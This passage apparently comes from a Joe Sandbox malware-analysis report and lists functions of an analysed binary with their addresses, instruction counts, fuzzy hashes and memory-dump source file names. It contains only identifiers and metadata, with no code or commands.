                                      • Instruction ID: 380b167a03238a0a5f28777525eb2e9b574c87c64db6bd40890c3250dd327c47
                                      • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                      • Instruction Fuzzy Hash: 5A021175E00619CFCF15CF98C4809ADBBB6FF88350F658169E80AAB351D731AA91CF90
                                      Function 00B3A648 Relevance: .3, Instructions: 339COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                      • Instruction ID: fb6733a3299344168bc2220b87a8d448ddaaa748b03880635b8c0c1b6a8174a8
                                      • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                      • Instruction Fuzzy Hash: 6EC16E76E29B814BD713873DD842265F795AFF7290F25D72EFCE472982FB2096818204
                                      Function 00B28BD9 Relevance: .3, Instructions: 302COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                      • Instruction ID: a83cf348dd367dd82c8fdfbc7cacedc7fbf86422086edea850f41fbc8f3911f7
                                      • Opcode Fuzzy Hash: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                      • Instruction Fuzzy Hash: D8B1F436D062B99FDB25CB64E4903EDBFF2EF56300F1985DAD4486B282DB344986C790
                                      Function 00B2AD38 Relevance: .3, Instructions: 302COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                      • Instruction ID: e168ce4333f6d5033f79a10a14e93cc421d5455bcc3524e77914ef52cba62afa
                                      • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                      • Instruction Fuzzy Hash: BFD13670600B50CFD725CF29D494B67B7E0FB49300F1489AED89A8BB91DB35E946CB91
                                      Function 00B1D720 Relevance: .3, Instructions: 295COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                      • Instruction ID: ce395b2de8aac3a1fb42cdca68c36783be720cbab06944d33e3b07625c91a615
                                      • Opcode Fuzzy Hash: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                      • Instruction Fuzzy Hash: 0BD13EB050C3808FD7148F15C0A476BBFE0AF95748F58899DE8D50B391C7BAC689DB92
                                      Function 00B045A8 Relevance: .3, Instructions: 291COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                      • Instruction ID: 82e48623b747ca5a4ff287d5c10b4a7b432035192b107b4fd6aa938ce6a73fbc
                                      • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                      • Instruction Fuzzy Hash: 41B18072A083515BD308CF25C89136BF7E2EFC8310F1ACA3EF99997291D774D9419A82
                                      Function 00AF1D78 Relevance: .3, Instructions: 291COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                      • Instruction ID: eccdcf46be3c752745835da6afa155b70a9faac1e62d99b64189eba3c0999271
                                      • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                      • Instruction Fuzzy Hash: 24B1B172A083159BD308CF65C45036BF7E2EFC8310F1AC93EB99997281D774D9419B82
                                      Function 00AF2138 Relevance: .3, Instructions: 284COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                      • Instruction ID: d614508db4542a615d70d665776e4b3b4cba860ea94dee20b172748afd73e259
                                      • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                      • Instruction Fuzzy Hash: F5B11671A097158FD706EE3AC481325F7E1AFE6280F50C72EF995A7662EB31E8818744
                                      Function 00B31EE8 Relevance: .3, Instructions: 274COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                      • Instruction ID: 7227885ed0f498e2d63276b50594ca11b086839205adc065f7265721016524fc
                                      • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                      • Instruction Fuzzy Hash: 7B91B071A002158BDF15CF68DC80BBAB7E4EB55300F3945E8ED18AB286D732DD09C7A2
                                      Function 00B496FD Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                      • Instruction ID: 6936b7be30552033b963fd71d9615a6f21eaf1611929de51e7f5f75b1a4db90a
                                      • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                      • Instruction Fuzzy Hash: 86B12C31610609DFDB19CF28C48AB667BE1FF45364F25869CE899CF2A2C335DA91DB40
                                      Function 00B1B198 Relevance: .3, Instructions: 268COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                      • Instruction ID: d775b9d9a9bcc64056ee2d605f841b9b111e40d95ad3ca376a94c69edea5bf00
                                      • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                      • Instruction Fuzzy Hash: D5C14A75A04B1A8FC715DF28C08045AB7F2FF88350F258A6DE8999B721D731E996CF81
                                      Function 00B2D5A8 Relevance: .3, Instructions: 258COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                      • Instruction ID: 769dfa12ad472c3261876a98eb6748982ccf5fa8401ec9ac555bc4be8431ee4f
                                      • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                      • Instruction Fuzzy Hash: CA9158319287A06AEB168B38DC417BAB794FFE7350F14C31AF98C764A1FB7186818345
                                      Function 00B3D39E Relevance: .2, Instructions: 242COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
